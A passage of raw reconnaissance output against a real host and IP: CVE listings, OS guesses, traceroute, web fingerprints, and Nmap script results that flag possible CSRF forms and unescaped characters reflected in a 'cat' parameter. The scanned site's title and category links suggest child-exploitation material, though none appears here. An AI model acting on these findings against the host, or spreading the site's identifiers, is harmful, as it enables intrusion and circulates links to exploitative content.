3108| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
3109| [70724] Debian Security Advisory DSA 2405-1 (apache2)
3110| [70235] Debian Security Advisory DSA 2298-2 (apache2)
3111| [70233] Debian Security Advisory DSA 2298-1 (apache2)
3112| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
3113| [69338] Debian Security Advisory DSA 2202-1 (apache2)
3114| [65131] SLES9: Security update for Apache 2 oes/CORE
3115| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
3116| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
3117| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
3118| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
3119| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
3120| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
3121| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
3122| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
3123| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
3124| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
3125| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
3126| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
3127| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
3128| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
3129| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
3130| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
3131| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
3132| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
3133| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
3134| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
3135| [11092] Apache 2.0.39 Win32 directory traversal
3136| [66081] SLES11: Security update for Apache 2
3137| [66074] SLES10: Security update for Apache 2
3138| [66070] SLES9: Security update for Apache 2
3139| [65893] SLES10: Security update for Apache 2
3140| [65888] SLES10: Security update for Apache 2
3141| [65510] SLES9: Security update for Apache 2
3142| [65249] SLES9: Security update for Apache 2
3143| [65230] SLES9: Security update for Apache 2
3144| [65228] SLES9: Security update for Apache 2
3145| [65207] SLES9: Security update for Apache 2
3146| [65136] SLES9: Security update for Apache 2
3147| [65017] SLES9: Security update for Apache 2
3148|
3149| SecurityTracker - https://www.securitytracker.com:
3150| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
3151| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
3152| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
3153| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
3154| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
3155|
3156| OSVDB - http://www.osvdb.org:
3157| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
3158|_
3159Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3160Device type: general purpose|broadband router|WAP|webcam
3161Running (JUST GUESSING): Linux 3.X|2.6.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
3162OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
3163Aggressive OS guesses: Linux 3.0 - 3.1 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
3164No exact OS matches for host (test conditions non-ideal).
3165Uptime guess: 30.015 days (since Fri Sep 6 00:04:25 2019)
3166Network Distance: 14 hops
3167TCP Sequence Prediction: Difficulty=262 (Good luck!)
3168IP ID Sequence Generation: All zeros
3169
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 41.17 ms 10.246.204.1
2 61.02 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
3 81.23 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
4 38.88 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
5 99.88 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
6 99.92 ms be2090.ccr22.ymq01.atlas.cogentco.com (154.54.45.117)
7 120.60 ms be3042.ccr21.lpl01.atlas.cogentco.com (154.54.44.161)
8 120.63 ms be2183.ccr42.ams03.atlas.cogentco.com (154.54.58.70)
9 120.64 ms be3458.ccr21.ams04.atlas.cogentco.com (154.54.39.186)
10 139.89 ms worldstream.demarc.cogentco.com (149.14.93.74)
11 139.89 ms 109.236.95.183
12 139.88 ms 190.2.158.155
13 139.89 ms 185.106.120.66
14 120.63 ms latina.petite.guru (185.82.200.52)
3186
3187NSE: Script Post-scanning.
3188Initiating NSE at 00:25
3189Completed NSE at 00:25, 0.00s elapsed
3190Initiating NSE at 00:25
3191Completed NSE at 00:25, 0.00s elapsed
3192######################################################################################################################################
3193http://www.ygmt.info [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
3194######################################################################################################################################
3195
3196wig - WebApp Information Gatherer
3197
3198
3199Scanning http://www.ygmt.info...
________________________ SITE INFO ________________________
IP Title
185.82.200.52 Books, videos, photos, fiction and non-fic

_________________________ VERSION _________________________
Name Versions Type
Apache 2.4.10 Platform
Debian 8.0 | 8.0 (pre-release) OS

___________________________________________________________
Time: 1.7 sec Urls: 809 Fingerprints: 40401
3211######################################################################################################################################
3212HTTP/1.1 200 OK
3213Date: Sun, 06 Oct 2019 04:25:43 GMT
3214Server: Apache/2.4.10 (Debian)
3215Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
3216ETag: "a0d-583eebde65fc0"
3217Accept-Ranges: bytes
3218Content-Length: 2573
3219Vary: Accept-Encoding
3220Content-Type: text/html
3221
3222HTTP/1.1 200 OK
3223Date: Sun, 06 Oct 2019 04:25:43 GMT
3224Server: Apache/2.4.10 (Debian)
3225Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
3226ETag: "a0d-583eebde65fc0"
3227Accept-Ranges: bytes
3228Content-Length: 2573
3229Vary: Accept-Encoding
3230Content-Type: text/html
3231
3232Allow: GET,HEAD,POST,OPTIONS
3233######################################################################################################################################
3234Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:25 EDT
3235NSE: Loaded 164 scripts for scanning.
3236NSE: Script Pre-scanning.
3237Initiating NSE at 00:25
3238Completed NSE at 00:25, 0.00s elapsed
3239Initiating NSE at 00:25
3240Completed NSE at 00:25, 0.00s elapsed
3241Initiating Parallel DNS resolution of 1 host. at 00:25
3242Completed Parallel DNS resolution of 1 host. at 00:25, 0.02s elapsed
3243Initiating SYN Stealth Scan at 00:25
3244Scanning www.ygmt.info (185.82.200.52) [1 port]
3245Discovered open port 443/tcp on 185.82.200.52
3246Completed SYN Stealth Scan at 00:25, 0.16s elapsed (1 total ports)
3247Initiating Service scan at 00:25
3248Scanning 1 service on www.ygmt.info (185.82.200.52)
3249Completed Service scan at 00:26, 12.85s elapsed (1 service on 1 host)
3250Initiating OS detection (try #1) against www.ygmt.info (185.82.200.52)
3251Retrying OS detection (try #2) against www.ygmt.info (185.82.200.52)
3252Initiating Traceroute at 00:26
3253Completed Traceroute at 00:26, 0.22s elapsed
3254Initiating Parallel DNS resolution of 14 hosts. at 00:26
3255Completed Parallel DNS resolution of 14 hosts. at 00:26, 0.22s elapsed
3256NSE: Script scanning 185.82.200.52.
3257Initiating NSE at 00:26
3258Completed NSE at 00:27, 87.79s elapsed
3259Initiating NSE at 00:27
3260Completed NSE at 00:27, 1.26s elapsed
3261Nmap scan report for www.ygmt.info (185.82.200.52)
3262Host is up (0.12s latency).
3263rDNS record for 185.82.200.52: latina.petite.guru
3264
3265PORT STATE SERVICE VERSION
3266443/tcp open ssl/ssl Apache httpd (SSL-only mode)
3267| http-brute:
3268|_ Path "/" does not require authentication
3269|_http-chrono: Request times for /; avg: 1066.37ms; min: 846.34ms; max: 1700.39ms
3270| http-csrf:
3271| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
3272| Found the following possible CSRF vulnerabilities:
3273|
3274| Path: https://www.ygmt.info:443/top50/index.php
3275| Form id:
3276| Form action: index.php
3277|
3278| Path: https://www.ygmt.info:443/top50/index.php
3279| Form id:
3280| Form action: index.php
3281|
3282| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
3283| Form id:
3284| Form action: index.php
3285|
3286| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
3287| Form id:
3288| Form action: index.php
3289|
3290| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
3291| Form id:
3292| Form action: index.php
3293|
3294| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
3295| Form id:
3296| Form action: index.php
3297|
3298| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
3299| Form id:
3300| Form action: index.php
3301|
3302| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
3303| Form id:
3304| Form action: index.php
3305|
3306| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
3307| Form id:
3308| Form action: index.php
3309|
3310| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
3311| Form id:
3312| Form action: index.php
3313|
3314| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
3315| Form id:
3316| Form action: index.php
3317|
3318| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
3319| Form id:
3320| Form action: index.php
3321|
3322| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
3323| Form id:
3324| Form action: index.php
3325|
3326| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
3327| Form id:
3328|_ Form action: index.php
3329|_http-date: Sun, 06 Oct 2019 04:26:17 GMT; -4s from local time.
3330|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
3331|_http-dombased-xss: Couldn't find any DOM based XSS.
3332|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
3333| http-errors:
3334| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
3335| Found the following error pages:
3336|
3337| Error Code: 400
3338| http://www.ygmt.info:80
3339|
3340| Error Code: 404
3341| http://www.ygmt.info:443/android-app:/
3342|
3343| Error Code: 404
3344|_ http://www.ygmt.info:443/url;
3345|_http-feed: Couldn't find any feeds.
3346|_http-fetch: Please enter the complete path of the directory to save data in.
3347| http-headers:
3348| Date: Sun, 06 Oct 2019 04:26:16 GMT
3349| Server: Apache/2.4.10 (Debian)
3350| Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
3351| ETag: "a0d-583eebde65fc0"
3352| Accept-Ranges: bytes
3353| Content-Length: 2573
3354| Vary: Accept-Encoding
3355| Connection: close
3356| Content-Type: text/html
3357|
3358|_ (Request type: HEAD)
3359|_http-jsonp-detection: Couldn't find any JSONP endpoints.
3360|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
3361| http-methods:
3362|_ Supported Methods: GET HEAD POST OPTIONS
3363|_http-mobileversion-checker: No mobile version detected.
3364| http-security-headers:
3365| Strict_Transport_Security:
3366|_ HSTS not configured in HTTPS Server
3367|_http-server-header: Apache/2.4.10 (Debian)
3368| http-sitemap-generator:
3369| Directory structure:
3370| /
3371| Other: 1
3372| /banner/
3373| jpg: 3
3374| /bn/
3375| png: 1
3376| /top50/
3377| Other: 1; php: 1
3378| Longest directory structure:
3379| Depth: 1
3380| Dir: /top50/
3381| Total files found (by extension):
3382|_ Other: 2; jpg: 3; php: 1; png: 1
3383|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3384|_http-title: 400 Bad Request
3385| http-unsafe-output-escaping:
3386| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
3387| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
3388| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
3389| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
3390| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
3391|_ Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
3392| http-vhosts:
3393|_127 names had status 400
3394|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
3395|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
3396|_http-xssed: No previously reported XSS vuln.
3397| vulscan: VulDB - https://vuldb.com:
3398| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
3399| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
3400| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
3401| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
3402| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
3403| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
3404| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
3405| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
3406| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
3407| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
3408| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
3409| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
3410| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
3411| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
3412| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
3413| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
3414| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
3415| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
3416| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
3417| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
3418| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
3419| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
3420| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
3421| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
3422| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
3423| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
3424| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
3425| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
3426| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
3427| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
3428| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
3429| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
3430| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
3431| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
3432| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
3433| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
3434| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
3435| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
3436| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
3437| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
3438| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
3439| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
3440| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
3441| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
3442| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
3443| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
3444| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
3445| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
3446| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
3447| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
3448| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
3449| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
3450| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
3451| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
3452| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
3453| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
3454| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
3455| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
3456| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
3457| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
3458| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
3459| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
3460| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
3461| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
3462| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
3463| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3464| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
3465| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
3466| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
3467| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
3468| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
3469| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
3470| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
3471| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
3472| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
3473| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
3474| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
3475| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
3476| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
3477| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
3478| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
3479| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
3480| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
3481| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
3482| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
3483| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
3484| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
3485| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
3486| [136370] Apache Fineract up to 1.2.x sql injection
3487| [136369] Apache Fineract up to 1.2.x sql injection
3488| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
3489| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
3490| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
3491| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
3492| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
3493| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
3494| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
3495| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
3496| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
3497| [134416] Apache Sanselan 0.97-incubator Loop denial of service
3498| [134415] Apache Sanselan 0.97-incubator Hang denial of service
3499| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
3500| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
3501| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
3502| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
3503| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
3504| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
3505| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
3506| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
3507| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
3508| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
3509| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
3510| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
3511| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
3512| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
3513| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
3514| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
3515| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
3516| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
3517| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
3518| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
3519| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
3520| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
3521| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
3522| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
3523| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
3524| [131859] Apache Hadoop up to 2.9.1 privilege escalation
3525| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
3526| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
3527| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
3528| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
3529| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
3530| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
3531| [130629] Apache Guacamole Cookie Flag weak encryption
3532| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
3533| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
3534| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
3535| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
3536| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
3537| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
3538| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
3539| [130123] Apache Airflow up to 1.8.2 information disclosure
3540| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
3541| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
3542| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
3543| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
3544| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3545| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3546| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3547| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
3548| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
3549| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
3550| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
3551| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
3552| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
3553| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
3554| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
3555| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
3556| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
3557| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
3558| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3559| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
3560| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3561| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
3562| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
3563| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
3564| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
3565| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
3566| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
3567| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
3568| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
3569| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
3570| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
3571| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
3572| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
3573| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
3574| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
